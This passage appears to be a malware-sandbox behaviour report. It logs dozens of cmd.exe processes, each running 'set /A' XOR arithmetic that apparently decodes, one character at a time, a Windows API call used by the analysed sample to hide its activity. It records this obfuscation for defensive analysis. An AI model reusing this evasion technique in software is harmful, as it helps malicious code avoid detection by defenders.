Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 2424, Parent PID: 4904

General

Target ID:	13
Start time:	10:04:10
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x78^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 1448, Parent PID: 2424

General

Target ID:	14
Start time:	10:04:10
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 4428, Parent PID: 4904

General

Target ID:	15
Start time:	10:04:10
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x79^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 4284, Parent PID: 4428

General

Target ID:	16
Start time:	10:04:10
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 5516, Parent PID: 4904

General

Target ID:	17
Start time:	10:04:10
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x71^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 7608, Parent PID: 5516

General

Target ID:	18
Start time:	10:04:10
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 2568, Parent PID: 4904

General

Target ID:	19
Start time:	10:04:10
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x71^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 372, Parent PID: 2568

General

Target ID:	20
Start time:	10:04:10
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 1988, Parent PID: 4904

General

Target ID:	21
Start time:	10:04:10
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x08^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 6136, Parent PID: 1988

General

Target ID:	22
Start time:	10:04:10
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 3324, Parent PID: 4904

General

Target ID:	23
Start time:	10:04:10
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x39^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 5004, Parent PID: 3324

General

Target ID:	24
Start time:	10:04:10
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 308, Parent PID: 4904

General

Target ID:	25
Start time:	10:04:11
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x2E^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 4004, Parent PID: 308

General

Target ID:	26
Start time:	10:04:11
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 384, Parent PID: 4904

General

Target ID:	27
Start time:	10:04:11
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x2A^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 2040, Parent PID: 384

General

Target ID:	28
Start time:	10:04:11
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 1456, Parent PID: 4904

General

Target ID:	29
Start time:	10:04:11
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x3F^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 1468, Parent PID: 1456

General

Target ID:	30
Start time:	10:04:11
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 1256, Parent PID: 4904

General

Target ID:	31
Start time:	10:04:11
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x2E^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 4216, Parent PID: 1256

General

Target ID:	32
Start time:	10:04:11
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 7352, Parent PID: 4904

General

Target ID:	33
Start time:	10:04:11
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x0D^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 6552, Parent PID: 7352

General

Target ID:	34
Start time:	10:04:11
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 5452, Parent PID: 4904

General

Target ID:	35
Start time:	10:04:11
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x22^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 2336, Parent PID: 5452

General

Target ID:	36
Start time:	10:04:11
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 4124, Parent PID: 4904

General

Target ID:	37
Start time:	10:04:11
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x27^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 3400, Parent PID: 4124

General

Target ID:	38
Start time:	10:04:11
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 1940, Parent PID: 4904

General

Target ID:	39
Start time:	10:04:12
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x2E^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 3504, Parent PID: 1940

General

Target ID:	40
Start time:	10:04:12
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 1236, Parent PID: 4904

General

Target ID:	41
Start time:	10:04:12
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x0A^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 7264, Parent PID: 1236

General

Target ID:	42
Start time:	10:04:12
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 664, Parent PID: 4904

General

Target ID:	43
Start time:	10:04:12
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x63^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 7608, Parent PID: 664

General

Target ID:	44
Start time:	10:04:12
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 5128, Parent PID: 4904

General

Target ID:	45
Start time:	10:04:12
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x26^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 368, Parent PID: 5128

General

Target ID:	46
Start time:	10:04:12
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 6528, Parent PID: 4904

General

Target ID:	47
Start time:	10:04:12
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x6B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 1144, Parent PID: 6528

General

Target ID:	48
Start time:	10:04:12
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 6976, Parent PID: 4904

General

Target ID:	49
Start time:	10:04:12
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x39^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 5260, Parent PID: 6976

General

Target ID:	50
Start time:	10:04:12
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 3280, Parent PID: 4904

General

Target ID:	51
Start time:	10:04:12
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x7F^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 1492, Parent PID: 3280

General

Target ID:	52
Start time:	10:04:12
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 1292, Parent PID: 4904

General

Target ID:	53
Start time:	10:04:13
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x6B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 6448, Parent PID: 1292

General

Target ID:	54
Start time:	10:04:13
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 1384, Parent PID: 4904

General

Target ID:	55
Start time:	10:04:13
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x67^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 1420, Parent PID: 1384

General

Target ID:	56
Start time:	10:04:13
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 6552, Parent PID: 4904

General

Target ID:	57
Start time:	10:04:13
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x6B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 3272, Parent PID: 6552

General

Target ID:	58
Start time:	10:04:13
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 2764, Parent PID: 4904

General

Target ID:	59
Start time:	10:04:13
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x22^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 7336, Parent PID: 2764

General

Target ID:	60
Start time:	10:04:13
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 5424, Parent PID: 4904

General

Target ID:	61
Start time:	10:04:13
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x6B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 4348, Parent PID: 5424

General

Target ID:	62
Start time:	10:04:13
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 8, Parent PID: 4904

General

Target ID:	63
Start time:	10:04:13
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x7B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 5940, Parent PID: 8

General

Target ID:	64
Start time:	10:04:13
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 1560, Parent PID: 4904

General

Target ID:	65
Start time:	10:04:14
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x33^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 1756, Parent PID: 1560

General

Target ID:	66
Start time:	10:04:14
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 5016, Parent PID: 4904

General

Target ID:	67
Start time:	10:04:14
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x73^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 5136, Parent PID: 5016

General

Target ID:	68
Start time:	10:04:14
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 5040, Parent PID: 4904

General

Target ID:	69
Start time:	10:04:14
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x7B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 5064, Parent PID: 5040

General

Target ID:	70
Start time:	10:04:14
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 4748, Parent PID: 4904

General

Target ID:	71
Start time:	10:04:14
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x7B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 1188, Parent PID: 4748

General

Target ID:	72
Start time:	10:04:14
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 1448, Parent PID: 4904

General

Target ID:	73
Start time:	10:04:14
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x7B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 2424, Parent PID: 1448

General

Target ID:	74
Start time:	10:04:14
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 1940, Parent PID: 4904

General

Target ID:	75
Start time:	10:04:14
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x7B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Conhost.exePID: 4428, Parent PID: 1940

General

Target ID:	76
Start time:	10:04:14
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 7340, Parent PID: 4904

General

Target ID:	77
Start time:	10:04:14
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x7B^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 7000, Parent PID: 7340

General

Target ID:	78
Start time:	10:04:14
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 2752, Parent PID: 4904

General

Target ID:	79
Start time:	10:04:15
